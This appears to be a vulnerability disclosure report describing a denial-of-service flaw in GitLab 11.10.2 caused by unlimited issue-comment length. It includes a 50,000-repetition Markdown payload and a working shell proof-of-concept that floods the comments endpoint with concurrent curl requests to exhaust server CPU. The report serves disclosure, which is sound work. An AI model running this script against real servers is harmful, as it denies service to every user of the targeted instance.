CVSS3: 6.5 Medium
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Privileges Required: LOW
  User Interaction: NONE
  Scope: UNCHANGED
  Confidentiality Impact: NONE
  Integrity Impact: NONE
  Availability Impact: HIGH
  Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
CVSS2: 4 Medium
  Access Vector: NETWORK
  Access Complexity: LOW
  Authentication: SINGLE
  Confidentiality Impact: NONE
  Integrity Impact: NONE
  Availability Impact: PARTIAL
  Vector: AV:N/AC:L/Au:S/C:N/I:N/A:P
EPSS: 0.001 Low
  Percentile: 32.6%
There is no limit on the number of characters in an issue comment, which allows a DoS attack. The DoS affects both the server side and the client side.
NOTE: This bug happens on GitLab.com.
Attack for Client-side
[a](/a/a/a/a/a/a/a/a/a/a/a/a/a/a.....(50000 times))
Result: I received the error message “Something went wrong while fetching comments. Please try again.” and I could not fetch any of the comments.
Note: In Step 5, if you cannot post the comment from the browser, send the HTTP request directly by some other means.
Note: The string to post in Step 5 is given in the attached file F481358.
Attack for Server-side
An attacker can exhaust server resources by continuously sending the request generated in Step 5 of [Attack for Client-side]. This causes a denial of service for all users.
For example, this can be verified with a script such as the following:
#!/bin/sh
# Build the comment body: a Markdown link whose target is "/a" repeated 50,000 times.
charBlock=$(head -c 50000 /dev/zero | sed -e 's/\x00/\/a/g')
payload='[a]('$charBlock')'
gitlabHost=$1
ProjectURL=$2
targetID=$3
loop=$4
# The request mirrors the one the browser sends in Step 5 of the client-side attack;
# the CSRF token and session cookie placeholders must be filled in from that request.
curl=`cat << EOS
curl
--insecure
--silent
--output /dev/null
${ProjectURL}/notes?target_id=${targetID}\&target_type=issue
--header 'Host: ${gitlabHost}'
--header 'X-CSRF-Token: [PLACEHOLDER]'
-b '_gitlab_session=[PLACEHOLDER]'
--data-binary 'note%5Bnoteable_type%5D=Issue&note%5Bnoteable_id%5D=3&note%5Bnote%5D=${payload}&merge_request_diff_head_sha=undefined'
EOS`
# Send ${loop} copies of the request concurrently.
for i in `seq ${loop}`
do
eval ${curl}&
done
Run the above script with the following command to see that the server’s CPU is exhausted:
$ ./poc.sh [GitLab host] [Project URL] [target ID(※1)] [Repeat count of request]
※1: Take this from the request generated in Step 5 of [Attack for Client-side].
System information
System:
Current User: git
Using RVM: no
Ruby Version: 2.5.3p105
Gem Version: 2.7.6
Bundler Version: 1.17.3
Rake Version: 12.3.2
Redis Version: 3.2.12
Git Version: 2.18.1
Sidekiq Version: 5.2.5
Go Version: unknown
GitLab information
Version: 11.10.2
Revision: f3e84e78b62
Directory: /opt/gitlab/embedded/service/gitlab-rails
DB Adapter: PostgreSQL
DB Version: 9.6.11
URL: https://gitlab.example.com
HTTP Clone URL: https://gitlab.example.com/some-group/some-project.git
SSH Clone URL: [email protected]:some-group/some-project.git
Using LDAP: no
Using Omniauth: yes
Omniauth Providers:
GitLab Shell
Version: 9.0.0
Repository storage paths:
- default: /var/opt/gitlab/git-data/repositories
GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell
Git: /opt/gitlab/embedded/bin/git
All comments on the issue will be inaccessible.
The CPU is exhausted and users will be unable to access the GitLab service.
NOTE: Any user who can comment on the issue can exploit this vulnerability.